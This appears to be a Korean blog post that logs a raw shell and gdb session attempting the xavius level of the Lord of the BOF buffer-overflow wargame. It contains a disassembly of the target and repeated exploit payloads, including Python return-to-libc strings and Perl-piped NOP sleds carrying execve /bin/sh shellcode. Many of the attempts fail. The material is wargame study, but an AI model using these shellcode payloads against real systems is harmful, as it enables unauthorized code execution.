> "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
File "<string>", line 1
print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
^
SyntaxError: invalid syntax
File "<string>", line 1
print "\xe0\x8a\x05\x40" +
^
SyntaxError: invalid syntax
[nightmare@localhost nightmare]$ $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
> "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" +
> "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')$(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
File "<string>", line 1
print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" +
^
SyntaxError: invalid syntax
File "<string>", line 1
print "\xe0\x8a\x05\x40" +
^
SyntaxError: invalid syntax
bash2: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAðú ¿fü ¿: command not found
[nightmare@localhost nightmare]$ $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
bash2: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAðú ¿fü ¿: command not found
[nightmare@localhost nightmare]$ ./xavius $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
[nightmare@localhost nightmare]$ ./xeratj $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
bash2: ./xeratj: No such file or directory
[nightmare@localhost nightmare]$ ./xerath $(python -c 'print "A"*44 + "\x10\x84\x04\x08" + "A"*4 + "\xf0\xfa\xff\xbf" + "\x66\xfc\xff\xbf"') $(python -c 'print "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ gdb -q xavius
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) r
Starting program: /home/nightmare/xavius
/bin/bash: /home/nightmare/xavius: Operation not permitted
/bin/bash: /home/nightmare/xavius: Operation not permitted
Program exited with code 01.
You can't do that without a process to debug.
(gdb) q
[nightmare@localhost nightmare]$ gdb -q xerath
(gdb) b main
Breakpoint 1 at 0x804871a
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb)
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 050.
(gdb) disas main
Dump of assembler code for function main:
0x8048714 <main>: push %ebp
0x8048715 <main+1>: mov %esp,%ebp
0x8048717 <main+3>: sub $0x2c,%esp
0x804871a <main+6>: mov 0x8049a3c,%eax
0x804871f <main+11>: push %eax
0x8048720 <main+12>: push $0x100
0x8048725 <main+17>: lea 0xffffffd8(%ebp),%eax
0x8048728 <main+20>: push %eax
0x8048729 <main+21>: call 0x8048408 <fgets>
0x804872e <main+26>: add $0xc,%esp
0x8048731 <main+29>: lea 0xffffffd8(%ebp),%eax
0x8048734 <main+32>: push %eax
0x8048735 <main+33>: push $0x80488bb
0x804873a <main+38>: call 0x8048438 <printf>
0x804873f <main+43>: add $0x8,%esp
0x8048742 <main+46>: cmpb $0xbf,0x7(%ebp)
0x8048746 <main+50>: jne 0x8048760 <main+76>
0x8048748 <main+52>: push $0x80488bf
0x804874d <main+57>: call 0x8048438 <printf>
0x8048752 <main+62>: add $0x4,%esp
0x8048755 <main+65>: push $0x0
0x8048757 <main+67>: call 0x8048458 <exit>
0x804875c <main+72>: add $0x4,%esp
0x804875f <main+75>: nop
0x8048760 <main+76>: cmpb $0x8,0x7(%ebp)
0x8048764 <main+80>: jne 0x8048780 <main+108>
0x8048766 <main+82>: push $0x80488e0
0x804876b <main+87>: call 0x8048438 <printf>
0x8048770 <main+92>: add $0x4,%esp
0x8048773 <main+95>: push $0x0
0x8048775 <main+97>: call 0x8048458 <exit>
0x804877a <main+102>: add $0x4,%esp
0x804877d <main+105>: lea 0x0(%esi),%esi
0x8048780 <main+108>: push $0x4
0x8048782 <main+110>: lea 0xffffffd8(%ebp),%eax
0x8048785 <main+113>: lea 0x2c(%eax),%edx
0x8048788 <main+116>: push %edx
0x8048789 <main+117>: lea 0xffffffd4(%ebp),%eax
0x804878c <main+120>: push %eax
0x804878d <main+121>: call 0x8048448 <memcpy>
0x8048792 <main+126>: add $0xc,%esp
0x8048795 <main+129>: push $0x2
0x8048797 <main+131>: push $0x8048902
0x804879c <main+136>: mov 0xffffffd4(%ebp),%eax
0x804879f <main+139>: push %eax
0x80487a0 <main+140>: call 0x8048418 <memcmp>
0x80487a5 <main+145>: add $0xc,%esp
0x80487a8 <main+148>: mov %eax,%eax
0x80487aa <main+150>: test %eax,%eax
0x80487ac <main+152>: jne 0x80487b0 <main+156>
0x80487ae <main+154>: jmp 0x80487e0 <main+204>
0x80487b0 <main+156>: mov 0xffffffd4(%ebp),%eax
0x80487b3 <main+159>: cmpb $0xc9,(%eax)
---Type <return> to continue, or q <return> to quit---
0x80487b6 <main+162>: jne 0x80487d8 <main+196>
0x80487b8 <main+164>: mov 0xffffffd4(%ebp),%eax
0x80487bb <main+167>: inc %eax
0x80487bc <main+168>: cmpb $0xc3,(%eax)
0x80487bf <main+171>: jne 0x80487d8 <main+196>
0x80487c1 <main+173>: push $0x8048920
0x80487c6 <main+178>: call 0x8048438 <printf>
0x80487cb <main+183>: add $0x4,%esp
0x80487ce <main+186>: push $0x0
0x80487d0 <main+188>: call 0x8048458 <exit>
0x80487d5 <main+193>: add $0x4,%esp
0x80487d8 <main+196>: incl 0xffffffd4(%ebp)
0x80487db <main+199>: jmp 0x8048795 <main+129>
0x80487dd <main+201>: lea 0x0(%esi),%esi
0x80487e0 <main+204>: push $0x2c
0x80487e2 <main+206>: push $0x0
0x80487e4 <main+208>: lea 0xffffffd8(%ebp),%eax
0x80487e7 <main+211>: push %eax
0x80487e8 <main+212>: call 0x8048468 <memset>
0x80487ed <main+217>: add $0xc,%esp
0x80487f0 <main+220>: lea 0xffffffd8(%ebp),%eax
0x80487f3 <main+223>: mov $0xbfffffcf,%edx
0x80487f8 <main+228>: mov %edx,%ecx
0x80487fa <main+230>: sub %eax,%ecx
0x80487fc <main+232>: mov %ecx,%eax
0x80487fe <main+234>: push %eax
0x80487ff <main+235>: push $0x0
0x8048801 <main+237>: lea 0xffffffd8(%ebp),%eax
0x8048804 <main+240>: lea 0x30(%eax),%edx
0x8048807 <main+243>: push %edx
0x8048808 <main+244>: call 0x8048468 <memset>
0x804880d <main+249>: add $0xc,%esp
0x8048810 <main+252>: push $0xb90
0x8048815 <main+257>: push $0x0
0x8048817 <main+259>: lea 0xffffffd8(%ebp),%eax
0x804881a <main+262>: lea 0xfffff448(%eax),%edx
0x8048820 <main+268>: push %edx
0x8048821 <main+269>: call 0x8048468 <memset>
0x8048826 <main+274>: add $0xc,%esp
0x8048829 <main+277>: leave
0x804882a <main+278>: ret
0x804882b <main+279>: nop
0x804882c <main+280>: nop
0x804882d <main+281>: nop
0x804882e <main+282>: nop
0x804882f <main+283>: nop
End of assembler dump.
(gdb) b *main+274
Breakpoint 2 at 0x8048826
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
You cannot use library function!
Program exited normally.
(gdb) ?
Undefined command: "". Try "help".
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Breakpoint 2, 0x8048826 in main ()
(gdb)
Continuing.
Program exited with code 050.
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb)
(gdb) c
Continuing.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Breakpoint 2, 0x8048826 in main ()
(gdb) x/wx 0x40015000
0x40015000: 0x61616161
(gdb) x/20wx 0x40015000
0x40015000: 0x61616161 0x61616161 0x61616161 0x61616161
0x40015010: 0x61616161 0x61616161 0x61616161 0x61616161
0x40015020: 0x000a6161 0x00000000 0x00000000 0x00000000
0x40015030: 0x00000000 0x00000000 0x00000000 0x00000000
0x40015040: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) ㅂ
Undefined command: "". Try "help".
(gdb) c
Continuing.
Program exited with code 050.
(gdb) r
Starting program: /home/nightmare/xerath
Breakpoint 1, 0x804871a in main ()
(gdb)
(gdb) c
Continuing.
Breakpoint 2, 0x8048826 in main ()
(gdb)
Continuing.
Program exited with code 050.
(gdb) r (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
Starting program: /home/nightmare/xerath (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
/bin/bash: syntax error near unexpected token `(p'
/bin/bash: -c: line 1: `exec /home/nightmare/xerath (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath'
Program exited with code 02.
You can't do that without a process to debug.
(gdb) (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
Undefined command: "". Try "help".
(gdb) q
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x5, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x16, "\x00\x50\x10\x40"';cat)|./xerath
j
XRh//shh/binRSÍ̀
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare여
bash2: 여: command not found
[nightmare@localhost nightmare]$ difference xavius xerath
bash2: difference: command not found
[nightmare@localhost nightmare]$ diff xavius xerath
[nightmare@localhost nightmare]$ cp xavius xxxxxx
[nightmare@localhost nightmare]$(perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xxxxxx
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"';cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ;cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xavius
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x12, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
id
[nightmare@localhost nightmare]$
[nightmare@localhost nightmare]$ (perl -e 'print "\x90"x28, "\xb8\xf9\xbf\x0f\x40\x50\x31\xc0\x50\xb8\xe0\x8a\x05\x40\x50\xc3", "\x02\x50\x10\x40"' ; cat)|./xerath
¸ù¿@P1P¸@PP@
[nightmare@localhost nightmare]$
'STUDY > Lord of the BOF' 카테고리의 다른 글
| Lord of the BOF (0) | 2019.02.07 |
|---|---|
| xavius->death_knight (0) | 2014.07.31 |
| succubus->nightmare (0) | 2014.07.10 |
| zombie_assassin->succubus (0) | 2014.07.08 |
| assassin->zombie_assassin (2) | 2014.06.26 |